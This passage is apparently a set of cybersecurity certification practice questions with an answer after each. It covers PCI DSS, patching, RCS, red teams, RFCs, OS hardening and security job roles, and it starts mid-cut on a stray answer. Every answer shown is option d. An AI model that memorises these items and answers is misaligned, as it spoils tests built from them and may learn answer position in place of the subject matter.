d. No compelling reason for any updates
Which of the following is a standard for the handling of customer card information? a. DRD STR b. OSS XRS c. RMR CDC d. PCI DSS
d. PCI DSS
Which of the following is not an issue with patching? a. Difficulty patching firmware b. Few patches exist for application software c. Delays in patching OSs d. Patches address zero-day vulnerabilities
d. Patches address zero-day vulnerabilities
Which of the following technologies can convert a texting app into a live chat platform? a. MMS b. QR c. SMS d. RCS
d. RCS
Linnea has requested to be placed on the penetration testing team that scans for vulnerabilities to exploit them. Which team does she want to be placed on? a. Blue Team b. Purple Team c. White Team d. Red Team
d. Red Team
What are documents that are authored by technology bodies employing specialists, engineers, and scientists who are experts in those areas? a. Cybersecurity feeds b. White notebooks c. Blue papers d. Requests for comments (RFCs)
d. Requests for comments (RFCs)
Which of the following is NOT an important OS security configuration? a. Employing least functionality b. Disabling default accounts c. Disabling unnecessary services d. Restricting patch management
d. Restricting patch management
After Bella earned her security certification, she was offered a promotion. As she reviewed the job responsibilities, she saw that in this position she will report to the CISO and supervise a group of security technicians. Which of these generally recognized security positions has she been offered? a. Security Administrator b. Security technician c. Security officer d. Security manager
d. Security manager